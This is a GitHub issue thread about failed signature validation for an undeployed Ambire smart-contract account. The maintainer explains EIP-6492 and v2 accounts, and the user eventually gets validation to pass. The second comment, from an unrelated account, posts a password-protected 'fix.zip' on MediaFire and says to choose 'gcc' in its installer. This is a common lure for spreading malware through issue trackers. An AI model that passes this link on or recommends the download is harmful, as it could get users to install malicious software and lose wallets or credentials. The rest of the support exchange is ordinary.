### ISSUE TITLE
Signature Validation failed on https://sigtool.ambire.com/

### ISSUE THREAD

**Issue by chzhongsending** [AmbireTech/signature-validator#11]
I failed signature validation on your tool site: https://sigtool.ambire.com/ using Ambire Wallet's Smart Contract Account.

I wonder if you could validate this:
Signer: `0x0ddEC00fFDD67FB67E9e263CD89d4Cf518B7D219`
Human Message: `Black Myth: Wukong`
Signature: `0xb80343ff617ff6a3543d606198b4d9ebe2a6ec0900521c8748af08aa0c5f809b5852bd258f64078cba868a5cd8899ca0454555c8b037283316f63c2e2c6f6b4e1b00`

Error reported:

> Verification Error: SignatureValidator#recoverSigner: invalid signature length

NodeJS and my go port reports the same problem.

I've tried with my MetaMask and it works perfectly.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ivshti** [comment]
@chzhongsending the problem is that the account is not deployed on Ethereum, so the signature validator tries to validate it as an EOA signature, therefore throwing an invalid length error

Change to a network on which this account is deployed (has been used once).

We are planning to solve this via [EIP-6492](https://eips.ethereum.org/EIPS/eip-6492). 

Feel free to reopen if you still can't get it to work

**Comment by chzhongsending** [comment]
> @chzhongsending the problem is that the account is not deployed on Ethereum, so the signature validator tries to validate it as an EOA signature, therefore throwing an invalid length error
> 
> Change to a network on which this account is deployed (has been used once).
> 
> We are planning to solve this via [EIP-6492](https://eips.ethereum.org/EIPS/eip-6492).
> 
> Feel free to reopen if you still can't get it to work

I want to try EIP-6492 and read your test [6_ethSign_6492.js ](https://github.com/AmbireTech/signature-validator/blob/main/tests/6_ethSign_6492.js) but I wonder how did the `factoryCallData` comes from.
Is it a call to `deployAndCall `on the [create2Factory](https://polygonscan.com/address/0xBf07a0Df119Ca234634588fbDb5625594E2a5BCA), what are the arguments I should pass to the method and how to encode them in my case? @Ivshti 


BTW1: I have Ambire Wallet and a deployed [Ambire V1 account](https://polygonscan.com/address/0xc53455347316700E9E53C7A62E1ce91Abb7335B7), but I'm not able to sign a message by Ambire Extension (on Chrome). I wonder who I should ask for help (how to sign message and how to validate it)

BTW2: It seemed that I didn't have permission to reopen this.

**Comment by Ivshti** [comment]
hey @chzhongsending, the factoryCallData is the calldata passed to the factory - correct, in the case of Ambire, it's a call to deployAndCall, but you have to get it from the ambire storage itself (which is difficult), or get ambire to sign using 6492 by signing on a network on which the account is not deployed yet

re your second question, please use a v2 account, v1 accounts signing is disabled from the extension. There is a workaround from the web wallet but I recommend just using a v2 account.

As for solving the issue in the first place, you have two options
- adjust the verifying network in the sigtool to match the network on which your account is already deployed
- sign on a network on which the account is not deployed to try EIP-6492. Or just sign with a brand new account.

**Comment by chzhongsending** [comment]
> hey @chzhongsending, the factoryCallData is the calldata passed to the factory - correct, in the case of Ambire, it's a call to deployAndCall, but you have to get it from the ambire storage itself (which is difficult), or get ambire to sign using 6492 by signing on a network on which the account is not deployed yet
> 
> re your second question, please use a v2 account, v1 accounts signing is disabled from the extension. There is a workaround from the web wallet but I recommend just using a v2 account.
> 
> As for solving the issue in the first place, you have two options
> 
> * adjust the verifying network in the sigtool to match the network on which your account is already deployed
> * sign on a network on which the account is not deployed to try EIP-6492. Or just sign with a brand new account.

Thanks, but how to create a V2 account? I didn't find it in the Help Center. It is the account I created/added with the extension (e.g `0x0ddEC00fFDD67FB67E9e263CD89d4Cf518B7D219` not deployed)? 

I'm working to validate with EIP-6492.

**Comment by Ivshti** [comment]
hey @chzhongsending, just use "Create a new hot wallet" or just pick any of the empty Smart Accounts proposed to you while adding an account from an existing seed or a hardware wallet. 

0x0ddEC00fFDD67FB67E9e263CD89d4Cf518B7D219 isn't deployed (on ethereum at least)

**Comment by chzhongsending** [comment]
> hey @chzhongsending, just use "Create a new hot wallet" or just pick any of the empty Smart Accounts proposed to you while adding an account from an existing seed or a hardware wallet.
> 
> 0x0ddEC00fFDD67FB67E9e263CD89d4Cf518B7D219 isn't deployed (on ethereum at least)

Thank you, I finally get it pass validation with both undeployed v2 account `0x0ddEC00fFDD67FB67E9e263CD89d4Cf518B7D219` and v1 account.
